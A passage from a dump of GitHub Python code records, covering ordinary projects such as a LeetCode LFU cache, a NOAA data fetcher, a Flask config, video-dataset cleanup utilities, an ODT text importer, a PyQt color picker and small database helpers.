self.freqQueues[self.lowFreq]\n while not found and curr:\n candidate = curr.pop(0)\n if self.counter[candidate] != self.lowFreq: continue\n del self.tracker[candidate]\n self.counter[candidate] = 0\n found = True\n if not found: self.lowFreq += 1\n else:\n self.currSize += 1\n self.lowFreq = 1\n self.counter[key] += 1\n if self.counter[key] not in self.freqQueues: self.freqQueues[self.counter[key]] = []\n self.freqQueues[self.counter[key]].append(key)\n self.tracker[key] = value\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"yiiilonggg/LeetCode","sub_path":"460. 
LFU Cache/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38887391781","text":"from src.pkg_algorithms import clu_grad_v2 as cgp\nfrom src import config as cfg\nimport so4gp as sgp\n\n\ndef compare_gps(clustered_gps, f_path, min_sup):\n same_gps = []\n miss_gps = []\n str_gps, real_gps = sgp.graank(f_path, min_sup, return_gps=True)\n for est_gp in clustered_gps:\n check, real_sup = sgp.contains_gp(est_gp, real_gps)\n # print([est_gp, est_gp.support, real_sup])\n if check:\n same_gps.append([est_gp, est_gp.support, real_sup])\n else:\n miss_gps.append(est_gp)\n # print(same_gps)\n print(str_gps)\n return same_gps, miss_gps\n\n\ndef run_comparison():\n output, est_gps = cgp.clugps(f_path=cfg.DATASET, min_sup=cfg.MIN_SUPPORT, return_gps=True)\n print(output)\n\n # Compare inferred GPs with real GPs\n hit_gps, miss_gps = compare_gps(est_gps, cfg.DATASET, cfg.MIN_SUPPORT)\n d_gp = sgp.DataGP(cfg.DATASET, cfg.MIN_SUPPORT)\n for gp in miss_gps:\n print(gp.print(d_gp.titles))\n\n\n# run_comparison()\n","repo_name":"owuordickson/spectral_gp","sub_path":"analysis/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12407707016","text":"import asyncio\nimport httpx\nimport pandas as pd\nfrom time import sleep, time\n\nclass AsyncPaginatedFetcher():\n def __init__(self, base_url, query, total_results, n_workers=10, results_per_page=20, result_handler=callable):\n self.n_workers = n_workers\n self.base_url = base_url\n self.total_pages = total_results // results_per_page\n self.results_per_page = results_per_page\n self.results_processed = 0\n self.total_results = total_results\n self.current_page = 0\n self.query = query\n self.query_text = query['queries'][0]['value']\n self.result_handler = result_handler\n self.queue = asyncio.Queue()\n self.failed_writes: pd.DataFrame = pd.DataFrame({'id': [], 'onestop_query': [], 'exception': []})\n\n def _populate_queue(self, queue):\n _total_pages = self.total_pages\n while _total_pages > 0:\n _total_pages -= 1\n page = {\n \"max\": self.results_per_page,\n \"offset\": (_total_pages) * self.results_per_page\n }\n _query = self.query.copy()\n _query['page'] = page\n queue.put_nowait(_query)\n\n async def fetch_all(self):\n self._populate_queue(self.queue)\n\n tasks = []\n for i in range(self.n_workers):\n task = asyncio.create_task(self._worker(self.queue))\n tasks.append(task)\n print(f\"Created {len(tasks)} tasks...\")\n\n # Wait until the queue is fully processed.\n await self.queue.join()\n\n # Cancel our worker tasks.\n for task in tasks:\n task.cancel()\n\n # Wait until all worker tasks are cancelled.\n results = await asyncio.gather(*tasks, return_exceptions=True)\n\n for results in results: \n if results.__class__ == Exception:\n print(f\"Exception in worker: {results}\")\n continue\n\n print('==== DONE =====')\n print(f\"Total results processed: {self.results_processed} / {self.total_results}\")\n \n async def _worker(self, queue):\n print(\"Worker started...\")\n sleepytime = 1\n while True:\n try: \n async with httpx.AsyncClient() as client:\n sleep(sleepytime // 1000)\n query = await queue.get()\n df = None\n response = None\n try:\n response = await client.post('https://data.noaa.gov/onestop/api/search/search/collection', json=query)\n if response.status_code == 500:\n 
print(f\"Error while fetching: {response.status_code}\")\n sleepytime *= 2\n continue\n except Exception as e:\n print(f\"Exception while fetching: {e}\")\n with open(f\"./data/onestop/logs.txt\", 'a') as f:\n f.write(f\"{query} -> {e}\")\n continue\n \n try:\n data = response.json()\n df = pd.json_normalize(data['data'])\n dtypes = df.dtypes\n df['attributes.spatialBounding.coordinates'] = df['attributes.spatialBounding.coordinates'].astype(str)\n df['attributes.dataFormats'] = df['attributes.dataFormats'].astype(str)\n df['onestop_query'] = self.query_text\n self.results_processed += df.shape[0]\n df.to_parquet(f\"./data/onestop/{int(time())}.parquet\")\n except Exception as e:\n print(f\"Exception while writing to file: {str(e)}\")\n with open(f\"./data/onestop/logs.txt\", 'a') as f:\n f.write(f\"{query} -> {e}\")\n continue\n # failed_df = df[['id', 'onestop_query']].drop_duplicates()\n # failed_df = failed_df.assign(exception=str(e))\n\n # self.failed_writes = pd.concat([self.failed_writes, failed_df], ignore_index=True)\n \n self.queue.task_done()\n print(f\"Finished fetching query: {query['page']['offset'] // self.results_per_page}\")\n except asyncio.CancelledError:\n print(\"Worker cancelled...\")\n break\n except Exception as e:\n print(f\"Exception in worker: {e}\")\n break\n","repo_name":"FMurray/ocean-mind","sub_path":"datasets/fetchers.py","file_name":"fetchers.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"25379755841","text":"import os, random, string\nfrom dotenv import load_dotenv\n\n\n# basedir = os.path.abspath(os.path.dirname(__file__))\n\n# GEOCODING_APIKEY = os.getenv('GEOCODING_APIKEY', None)\n\n\nclass Config(object):\n\n basedir = os.path.abspath(os.path.dirname(__file__))\n\n dotenv_path = os.path.join(basedir, '.env')\n load_dotenv(dotenv_path)\n print(dotenv_path)\n print(os.listdir(basedir)) \n # Assets Management\n ASSETS_ROOT = os.getenv('ASSETS_ROOT', '/static/assets') \n \n # Set up the App SECRET_KEY\n SECRET_KEY = os.getenv('SECRET_KEY', None)\n if not SECRET_KEY:\n SECRET_KEY = ''.join(random.choice( string.ascii_lowercase ) for i in range( 32 )) \n\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n DB_ENGINE = os.getenv('DB_ENGINE' , None)\n DB_USERNAME = os.getenv('DB_USERNAME' , None)\n DB_PASS = os.getenv('DB_PASS' , None)\n DB_HOST = os.getenv('DB_HOST' , None)\n DB_PORT = os.getenv('DB_PORT' , None)\n DB_NAME = os.getenv('DB_NAME' , None)\n\n USE_SQLITE = True \n\n # try to set up a Relational DBMS\n if DB_ENGINE and DB_NAME and DB_USERNAME:\n\n try:\n \n # Relational DBMS: PSQL, MySql\n SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(\n DB_ENGINE,\n DB_USERNAME,\n DB_PASS,\n DB_HOST,\n DB_PORT,\n DB_NAME\n ) \n\n USE_SQLITE = False\n\n except Exception as e:\n\n print('> Error: DBMS Exception: ' + str(e) )\n print('> Fallback to SQLite ') \n\n if USE_SQLITE:\n\n # This will create a file in FOLDER\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'database', 'database.db')\n\n GEOCODING_APIKEY = os.getenv('GEOCODING_APIKEY', None)\n \n GEOJSON_FILE_PATH = os.path.join(basedir,'database', \"neighbourhoods.geojson\")\n\n RF_MODEL_PATH=os.path.join(basedir,'models', \"RatingEstimation_random_forest_model.joblib\")\n\n MF_MODEL_PATH=os.path.join(basedir,'models', \"SVD_matrix_factorization_model.surprise\")\n\n SVD_PARAM={\n 'n_factors': 100, \n 'n_epochs': 50, \n 'lr_all': 0.007, \n 'reg_all': 0.02, \n 'lr_bu': 0.005, \n 
'lr_bi': 0.005, \n 'reg_bu': 0.02, \n 'reg_bi': 0.01, \n 'lr_pu': 0.01, \n 'lr_qi': 0.01, \n 'reg_pu': 0.01, \n 'reg_qi': 0.02\n } \n\n RECOMMEND_DEFAULT_TOPN=10\n\n ALPHA=0.7\n POI_COLUMNS = ['store', 'food', 'health', 'restaurant', 'hospital', 'lodging', 'finance', 'cafe', 'convenience_store', \n 'clothing_store', 'atm', 'shopping_mall', 'grocery_or_supermarket', 'home_goods_store', 'school', \n 'bakery', 'beauty_salon', 'transit_station', 'place_of_worship', 'pharmacy', 'meal_takeaway', \n 'furniture_store', 'tourist_attraction', 'secondary_school', 'supermarket', 'doctor', 'shoe_store', \n 'dentist', 'jewelry_store', 'church', 'bank', 'primary_school', 'electronics_store', 'gym', 'spa', \n 'car_repair', 'pet_store', 'bus_station', 'university', 'park', 'general_contractor', 'subway_station', \n 'real_estate_agency', 'florist', 'hair_care', 'department_store', 'hardware_store', 'car_dealer', \n 'veterinary_care', 'travel_agency', 'bicycle_store', 'book_store', 'laundry', 'plumber', \n 'meal_delivery', 'lawyer', 'parking', 'mosque', 'physiotherapist', 'art_gallery', 'insurance_agency', \n 'bar', 'museum', 'storage', 'movie_theater', 'moving_company', 'liquor_store', 'gas_station', \n 'electrician', 'car_rental', 'locksmith', 'car_wash', 'post_office', 'embassy', 'night_club', \n 'fire_station', 'amusement_park', 'library', 'hindu_temple', 'local_government_office', \n 'funeral_home', 'bowling_alley', 'cemetery', 'aquarium', 'roofing_contractor', 'stadium', 'painter', \n 'courthouse', 'drugstore', 'campground', 'accounting', 'airport', 'zoo', 'casino', 'synagogue', \n 'premise', 'taxi_stand', 'police', 'light_rail_station', 'city_hall', 'train_station', \n 'natural_feature', 'subpremise']\n SEMANTIC_GROUPS = {\n 'store_group': ['store', 'shopping_mall', 'grocery_or_supermarket', 'convenience_store', 'clothing_store', 'home_goods_store', 'electronics_store', 'department_store', 'furniture_store'],\n 'food_group': ['food', 'restaurant', 'cafe', 'bakery', 'meal_takeaway'],\n 'health_group': ['health', 'hospital', 'pharmacy', 'doctor', 'dentist', 'physiotherapist'],\n 'finance_group': ['finance', 'atm', 'bank', 'insurance_agency'],\n 'education_group': ['school', 'secondary_school', 'primary_school', 'university'],\n 'transportation_group': ['transit_station', 'bus_station', 'subway_station', 'taxi_stand', 'train_station', 'light_rail_station'],\n 'entertainment_group': ['movie_theater', 'amusement_park', 'bowling_alley', 'casino', 'night_club'],\n 'culture_group': ['museum', 'art_gallery', 'library', 'hindu_temple', 'church', 'mosque', 'synagogue'],\n 'recreation_group': ['park', 'gym', 'spa', 'stadium', 'zoo', 'aquarium'],\n 'services_group': ['laundry', 'plumber', 'lawyer', 'post_office', 'car_wash', 'embassy', 'police', 'funeral_home', 'moving_company']\n }\n\n COLORS = ['#8B0000', '#DC143C', '#FF7F50', '#CD5C5C', '#FA8072', '#FF8C00', '#FFD700', '#A52A2A', '#FF6347', '#FFA07A']\n MAP_CENTER=[1.3521, 103.8198] #center of Singapore\n\n\nclass ProductionConfig(Config):\n DEBUG = False\n\n # Security\n SESSION_COOKIE_HTTPONLY = True\n REMEMBER_COOKIE_HTTPONLY = True\n REMEMBER_COOKIE_DURATION = 3600\n\nclass DebugConfig(Config):\n DEBUG = True\n\n\n# Load all possible configurations\nconfig_dict = {\n 'Production': ProductionConfig,\n 'Debug' : DebugConfig\n}\n\n\n\n 
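# Illustrative lookup (added sketch; the DEBUG env-var name is an assumption):\n#   import os\n#   AppConfig = config_dict['Debug' if os.getenv('DEBUG') else 'Production']\n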
","repo_name":"Leelinze/IRS-PM-2023-10-29-IS05FT-GRP3-Rental-Recommendation-Systems-in-Singapore","sub_path":"SystemCode/Rental-Recommendation-System-in-Singapore/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"34941608366","text":"import os\nfrom moviepy.editor import VideoFileClip\nimport cv2\nimport shutil\nimport sys\nimport json\n\nsys.path.append(os.path.join(os.getcwd(), 'configs'))\nfrom global_namespace import PATH_TO_PROJECT, PATH_TO_PERSISTENT_STORAGE,\\\n PATH_TO_LOCAL_DRIVE, PATH_TO_KINETICS_DATASET\n\n\ndef shifted_croped_filter(path):\n listOfFiles = get_list_of_mp4(path)\n for file in listOfFiles:\n if os.path.basename(file).startswith('('):\n os.remove(file)\ndef non_mp4_checker(path):\n listOfFiles = get_list_of_all_files(path)\n if False in [file.endswith('.mp4') for file in listOfFiles]:\n return True\n return False\ndef non_mp4_finder(path):\n out = []\n listOfFiles = get_list_of_all_files(path)\n for elem in listOfFiles:\n if not elem.endswith('.mp4'):\n out.append(elem)\n return out\ndef bad_duration_finder(path, low, high):\n out = []\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration < low or clip.duration > high:\n out.append(elem)\n clip.close()\n except:\n pass\n return out\ndef bad_duration_filter(path, low, high):\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration < low or clip.duration > high:\n os.remove(elem)\n clip.close()\n except:\n pass\ndef list_of_all_durations(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n o.append(clip.duration)\n clip.close()\n except:\n pass\n return o\ndef list_of_all_fps(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n o.append(clip.fps)\n clip.close()\n except:\n pass\n return o\ndef list_of_all_sizes(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n o.append(clip.size)\n clip.close()\n except:\n pass\n return o\ndef list_of_all_nf(path):\n listOfFiles = get_list_of_mp4(path)\n o = []\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n cap = cv2.VideoCapture(elem)\n num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n o.append(num_frames)\n cap.release()\n clip.close()\n except:\n pass\n return o\ndef bad_mp4_finder(path):\n out = []\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration == 0 or clip.fps == 0:\n out.append(elem)\n clip.close()\n except:\n pass\n return out\ndef bad_mp4_filter(path):\n listOfFiles = get_list_of_mp4(path)\n for elem in listOfFiles:\n try:\n clip = VideoFileClip(elem)\n if clip.duration == 0 or clip.fps == 0:\n os.remove(elem)\n clip.close()\n except:\n pass\ndef get_list_of_mp4(path):\n listOfFiles = list()\n for (dirpath, dirnames, filenames) in os.walk(path):\n listOfFiles += [os.path.join(dirpath, file) for file in filenames if file.endswith('.mp4')]\n return listOfFiles\ndef get_list_of_all_files(path):\n listOfFiles = list()\n for (dirpath, dirnames, filenames) in os.walk(path):\n listOfFiles += [os.path.join(dirpath, file) for file in filenames]\n return listOfFiles\ndef corrupted_mp4_finder(path):\n out = []\n listOfFiles = 
get_list_of_mp4(path)\n for file in listOfFiles:\n try:\n clip = VideoFileClip(file)\n clip.close()\n except:\n out.append(file)\n return out\n\ndef if_exists_delete(path):\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n else:\n os.mkdir(path)\n\ndef check_fetched(dataset_name):\n if os.path.exists(os.path.join(PATH_TO_PERSISTENT_STORAGE, dataset_name)):\n return True\n else:\n return False\n\ndef check_shifted(dataset_name):\n if os.path.exists(os.path.join(PATH_TO_PERSISTENT_STORAGE, dataset_name + '_exp')):\n return True\n else:\n return False\n\ndef log_fetched_dataset(dataset_name, lower_bound_duration=None, upper_bound_duration=None):\n path_to_dataset = os.path.join(PATH_TO_PERSISTENT_STORAGE, dataset_name)\n path_to_failed_files = os.path.join(path_to_dataset, 'info.txt')\n info = {}\n all_mp4s = get_list_of_mp4(path_to_dataset)\n non_mp4_files = non_mp4_finder(path_to_dataset)\n if lower_bound_duration is not None:\n bad_duration_files = bad_duration_finder(path_to_dataset, lower_bound_duration, upper_bound_duration)\n else:\n bad_duration_files = [None]\n all_durations = list_of_all_durations(path_to_dataset)\n all_fpss = list_of_all_fps(path_to_dataset)\n all_sizes = list_of_all_sizes(path_to_dataset)\n all_nfs = list_of_all_nf(path_to_dataset)\n corrupted_mp4s = corrupted_mp4_finder(path_to_dataset)\n with open(path_to_failed_files) as handler:\n failed_files = handler.readlines()\n info['all_durations'] = all_durations\n info['bad_duration_files'] = bad_duration_files\n info['non_mp4_files'] = non_mp4_files\n info['all_fpss'] = all_fpss\n info['all_sizes'] = all_sizes\n info['all_nfs'] = all_nfs\n info['corrupted_mp4s'] = corrupted_mp4s\n info['failed_files'] = failed_files\n info['all_mp4s'] = all_mp4s\n assert len(info['all_durations']) == len(info['all_fpss'])\n assert len(info['all_mp4s']) == len(info['all_fpss']) + len(info['corrupted_mp4s'])\n return info\n\ndef filter_fetched_data(exp_config, path):\n listOfFiles = get_list_of_mp4(path)\n cnts = [0, 0, 0]\n for elem in listOfFiles:\n if not elem.endswith('(t).mp4'):\n print('Not trimmed: ', elem)\n if 'train' in elem:\n cnts[0] += 1\n elif 'eval' in elem:\n cnts[1] += 1\n elif 'test' in elem:\n cnts[2] += 1\n print(cnts)\n os.remove(elem)\n try:\n clip = VideoFileClip(elem)\n if clip.duration < exp_config['dataset']['min_duration'] or clip.fps < exp_config['dataset']['min_fps']:\n print('Bad duration or fps (Deleted):', elem)\n if 'train' in elem:\n cnts[0] += 1\n elif 'eval' in elem:\n cnts[1] += 1\n elif 'test' in elem:\n cnts[2] += 1\n print(cnts)\n os.remove(elem)\n clip.close()\n except:\n print('Corrupted(Deleted):', elem)\n if 'train' in elem:\n cnts[0] += 1\n elif 'eval' in elem:\n cnts[1] += 1\n elif 'test' in elem:\n cnts[2] += 1\n print(cnts)\n os.remove(elem)\n\ndef number_of_examples(path):\n listOfFiles = get_list_of_mp4(path)\n return len(listOfFiles)","repo_name":"parsley9877/AVS","sub_path":"utils/sys/os_tools.py","file_name":"os_tools.py","file_ext":"py","file_size_in_byte":7257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8237760474","text":"\"\"\"Import module for odt source files.\"\"\"\n\nimport unicodedata\nimport xml.etree.ElementTree as etree\nimport zipfile\n\nfrom sparv.api import Config, SourceFilename, Output, Source, SourceStructure, Text, get_logger, importer, util\n\nlogger = get_logger(__name__)\n\n\n@importer(\"odt import\", file_extension=\"odt\", outputs=[\"text\"], text_annotation=\"text\", 
config=[\n Config(\"odt_import.prefix\", \"\", description=\"Optional prefix to add to annotation names.\"),\n Config(\"odt_import.keep_control_chars\", False, description=\"Set to True if control characters should not be \"\n \"removed from the text.\"),\n Config(\"odt_import.normalize\", \"NFC\", description=\"Normalize input using any of the following forms: \"\n \"'NFC', 'NFKC', 'NFD', and 'NFKD'.\")\n])\ndef parse(source_file: SourceFilename = SourceFilename(),\n source_dir: Source = Source(),\n prefix: str = Config(\"odt_import.prefix\"),\n keep_control_chars: bool = Config(\"odt_import.keep_control_chars\"),\n normalize: str = Config(\"odt_import.normalize\")) -> None:\n \"\"\"Parse odt file as input to the Sparv Pipeline.\n\n Args:\n source_file: The source filename.\n source_dir: The source directory.\n prefix: Optional prefix for output annotation.\n keep_control_chars: Set to True to keep control characters in the text.\n normalize: Normalize input text using any of the following forms: 'NFC', 'NFKC', 'NFD', and 'NFKD'.\n 'NFC' is used by default.\n \"\"\"\n source_file_path = str(source_dir.get_path(source_file, \".odt\"))\n\n # Parse odt and extract all text content\n text = OdtParser(source_file_path).text\n\n if not keep_control_chars:\n text = util.misc.remove_control_characters(text)\n\n if normalize:\n text = unicodedata.normalize(normalize, text)\n\n Text(source_file).write(text)\n\n # Make up a text annotation surrounding the whole file\n text_annotation = \"{}.text\".format(prefix) if prefix else \"text\"\n Output(text_annotation, source_file=source_file).write([(0, len(text))])\n SourceStructure(source_file).write([text_annotation])\n\n\nclass OdtParser():\n \"\"\"\n Parse an odt file and extract its text content.\n\n Inspired by https://github.com/deanmalmgren/textract\n \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n self.extract()\n\n def extract(self):\n \"\"\"Extract text content from odt file.\"\"\"\n # Get content XML file from ODT zip archive\n with open(self.filename, \"rb\") as stream:\n zip_stream = zipfile.ZipFile(stream)\n content = etree.fromstring(zip_stream.read(\"content.xml\"))\n # Iterate the XML and extract all strings\n self.text = \"\"\n for child in content.iter():\n if child.tag in [self.ns(\"text:p\"), self.ns(\"text:h\")]:\n self.text += self.get_text(child) + \"\\n\\n\"\n # Remove the final two linebreaks\n if self.text:\n self.text = self.text[:-2]\n\n def get_text(self, element):\n \"\"\"Recursively extract all text from element.\"\"\"\n buffer = \"\"\n if element.text is not None:\n buffer += element.text\n for child in element:\n if child.tag == self.ns(\"text:tab\"):\n buffer += \"\\t\"\n if child.tail is not None:\n buffer += child.tail\n elif child.tag == self.ns(\"text:s\"):\n buffer += \" \"\n if child.get(self.ns(\"text:c\")) is not None:\n buffer += \" \" * (int(child.get(self.ns(\"text:c\"))) - 1)\n if child.tail is not None:\n buffer += child.tail\n # Add placeholders for images\n elif child.tag == self.ns(\"drawing:image\"):\n image = child.get(self.ns(\"xmlns:href\"))\n if image:\n buffer += f\"----{image}----\"\n else:\n buffer += self.get_text(child)\n if element.tail is not None:\n buffer += element.tail\n return buffer\n\n def ns(self, tag):\n \"\"\"Get the name for 'tag' including its namespace.\"\"\"\n nsmap = {\n \"text\": \"urn:oasis:names:tc:opendocument:xmlns:text:1.0\",\n \"drawing\": \"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\",\n \"xmlns\": \"http://www.w3.org/1999/xlink\"\n }\n 
domain, tagname = tag.split(\":\")\n return f\"{{{nsmap[domain]}}}{tagname}\"\n","repo_name":"spraakbanken/sparv-pipeline","sub_path":"sparv/modules/odt_import/odt_import.py","file_name":"odt_import.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"51"} +{"seq_id":"262545313","text":"import numpy as np\nfrom PyQt5.QtGui import QPixmap, QMouseEvent, QColor, QLinearGradient, QBrush, QPalette\n\nfrom window.window import Ui_MainWindow\n\n\nclass ColorController:\n\n def __init__(self, win: Ui_MainWindow):\n self.win = win\n self.color = QColor()\n pixmap = QPixmap('window\\\\resources\\\\multicolored-circle.png')\n self.pixmap = pixmap.scaledToHeight(win.l_color_role.height())\n win.l_color_role.setPixmap(self.pixmap)\n win.l_color_role.mousePressEvent = self._get_pixel\n win.sl_saturation.valueChanged.connect(self._slider_change_event)\n win.sl_value.valueChanged.connect(self._slider_change_event)\n self._slider_change_event()\n self.set_gradient_in_saturation_slider()\n\n\n def _get_pixel(self, event: QMouseEvent):\n x = event.pos().x()\n y = event.pos().y()\n c = self.pixmap.toImage().pixel(x,y) # color code (integer): 3235912\n self.color.setRgba(c) # color object\n self.set_gradient_in_saturation_slider()\n self._slider_change_event(event)\n\n def set_gradient_in_saturation_slider(self):\n self.win.sl_saturation.setStyleSheet(f'''QSlider::groove:horizontal {{\n background:qlineargradient(x1:0, y1:0, x2:1, y2:0,\n stop:0 #fff, stop:1 rgb{self.color.getRgb()},);\n height: 10px;\n }}\n QSlider::handle::horizontal\n {{\n background: #333;\n width:8px;\n margin: -6px 0;\n }}\n ''')\n\n def _slider_change_event(self, event=None):\n self.color.setHsv(self.color.getHsv()[0], self.win.sl_saturation.value(), self.win.sl_value.value())\n self.win.l_current_color.setText(self.color.name().upper())\n text_color = QColor()\n if np.sum(self.color.getRgb()) > 470:\n text_color.setNamedColor('#000')\n else:\n text_color.setNamedColor('#fff')\n self.win.l_current_color.setStyleSheet(\n f'background-color:rgb{self.color.getRgb()}; color : rgb{text_color.getRgb()};')\n","repo_name":"IlyaLight/pyqt_color_picker","sub_path":"window/controllers/static_color.py","file_name":"static_color.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37633590889","text":"import uuid\nimport pickle\nimport jsonpickle\nclass Guitarra:\n\n\n def __init__(self, color, modelo, marca,\n madera_del_mastil='Roble', madera_del_diapason='Roble', precio=0,\n afinacion='RE', *args, **kargs):\n self.color= color\n self.marca = marca\n self.modelo = modelo\n self.serial = uuid.uuid4()\n self.afinacion = afinacion\n self.madera_del_mastil = madera_del_mastil\n self.madera_del_diapason = madera_del_diapason\n self.precio =precio\n\n\n def __str__(self):\n return f\"{self.serial}--{self.color}--{self.marca}--{self.modelo}\"\n\n def __repr__(self):\n return str(self.serial)\n def pintar(self, nuevo_color):\n self.color = nuevo_color\n\n\n def apreciar(self, nuevo_precio):\n self.precio = nuevo_precio\n\n def cumple(self, especificacion):\n dict_guitarra = self.__dict__\n for k in especificacion.get_keys():\n if k not in dict_guitarra or dict_guitarra[k] != especificacion.get_value(k):\n return False\n return True\n\n @classmethod\n def save(cls, guitarra):\n binary_open= open(str(guitarra.serial)+'.gui', mode='wb')\n 
pickle.dump(guitarra,binary_open)\n binary_open.close()\n\n @classmethod\n def load(cls, file_name):\n binary_open = open(file_name, mode='rb')\n guitarra=pickle.load(binary_open)\n binary_open.close()\n return guitarra\n\n @classmethod\n def save_json(cls, guitarra):\n text_open= open(str(guitarra.serial)+'.json', mode='w')\n json_gui=jsonpickle.encode(guitarra)\n text_open.write(json_gui)\n text_open.close()\n\n @classmethod\n def load_json(cls, file_name):\n text_open = open(file_name, mode='r')\n json_gui=text_open.readline()\n guitarra=jsonpickle.decode(json_gui)\n text_open.close()\n return guitarra","repo_name":"AlterCodex/PYTHON-EAM-2021-2","sub_path":"Clases/clase_23_09_2021/guitarra.py","file_name":"guitarra.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32532425529","text":"\"\"\"Seed module.\"\"\"\nfrom src.utilities.app_logger import logger\nfrom src.constants import REDIS_ADDRESS\nfrom src.backing_redis import redis_client\n\n\ndef seed_db():\n \"\"\"Seed the Backing Redis with some data.\"\"\"\n r = redis_client(redis_address=REDIS_ADDRESS)\n\n for i in range(1, 11):\n r.set(f\"seeded_key{i}\", f\"seeded_value_{i}\")\n\n logger.info(\"Seeded the Backing Redis with some data.\")\n\n\ndef clean_db():\n \"\"\"Clean the Backing Redis.\"\"\"\n r = redis_client(redis_address=REDIS_ADDRESS)\n for i in range(1, 11):\n r.delete(f\"seeded_key{i}\")\n\n logger.info(\"Cleaned the Backing Redis.\")\n","repo_name":"amirsalaar/redis-proxy","sub_path":"tests/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23615949663","text":"#给一个链表,若其中包含环,请找出该链表的环的入口结点,否则,输出null。\r\n#思路 遍历访问链表 记录地址 地址重复则为入口\r\n\r\nclass Solution:\r\n def EntryNodeOfLoop(self, pHead):\r\n li = []\r\n p = pHead\r\n while p!=None:\r\n if id(p) not in li:\r\n li.append(id(p))\r\n p = p.next\r\n else:\r\n return p","repo_name":"FireNoddles/-offer-","sub_path":"010. 链表中环的入口结点.py","file_name":"010. 
链表中环的入口结点.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19290330250","text":"import motor.motor_asyncio\n\nfrom core.calculator import Calculator\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(\"mongodb://mdb:27017\")\ndatabase = client[\"rpn_calculator\"]\noperations_collection = database[\"operations\"]\n\ncalc = Calculator()\n\nasync def connect():\n \"\"\"\n Establish a connection to the MongoDB database.\n \"\"\"\n try:\n await client.admin.command('ping')\n print(\"Connected to MongoDB\")\n except Exception as e:\n print(f\"Failed to connect to MongoDB: {e}\")\n raise e\n\nasync def close():\n \"\"\"\n Close the connection to the MongoDB database.\n \"\"\"\n if client:\n client.close()\n print(\"Closed MongoDB connection\")\n \ndef operation_helper(operation) -> dict:\n return {\n \"id\": str(operation[\"_id\"]),\n \"expression\": operation[\"expression\"],\n \"result\": operation[\"result\"],\n }\n\nasync def retrieve_all_operations():\n \"\"\"\n Retrieve all operations present in the database.\n \"\"\"\n operations = []\n async for operation in operations_collection.find():\n operations.append(operation_helper(operation))\n return operations\n\nasync def add_operation(operation_data: dict) -> dict:\n \"\"\"\n Add a new operation into to the database.\n \"\"\"\n operation = await operations_collection.insert_one(operation_data)\n new_operation = await operations_collection.find_one({\"_id\": operation.inserted_id})\n return operation_helper(new_operation)\n\nasync def delete_all_operations():\n \"\"\"\n Deletes all records from the 'operations' collection.\n \"\"\"\n await operations_collection.delete_many({})","repo_name":"Shynexiii/rpn-calculator-api","sub_path":"api/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17654880150","text":"import sqlalchemy as db\n\ndef teste1():\n \"\"\"\n Teste acessando diretamente ao banco\n \"\"\"\n engine = db.create_engine('sqlite:///test.sqlite') \n connection = engine.connect()\n metadata = db.MetaData()\n Emp = db.Table('emp', metadata,\n db.Column('Id',db.Integer()),\n db.Column('name', db.String(255),nullable=False),\n db.Column('salary', db.Float(), default=100.0),\n db.Column('active', db.Boolean(), default=True)\n )\n #metadata.create_all(engine)\n #Inserting record one by one\n #query = db.insert(Emp).values(Id=1, name='naveen', salary=60000.00, active=True)\n #ResultProxy = connection.execute(query)\n\n #Equivalent to 'SELECT * FROM census'\n query = db.select([Emp])\n ResultProxy = connection.execute(query)\n ResultSet = ResultProxy.fetchall()\n\n for elem in ResultSet:\n print(\"{name} {salary}\".format(name=elem.name, salary=elem.salary))\n\n\ndef teste2():\n \"\"\"\n Teste declarativa\n \"\"\"\n from database import db_session\n from models import User\n #u = User('admin', 'admin@localhost')\n #db_session.add(u)\n #db_session.commit()\n 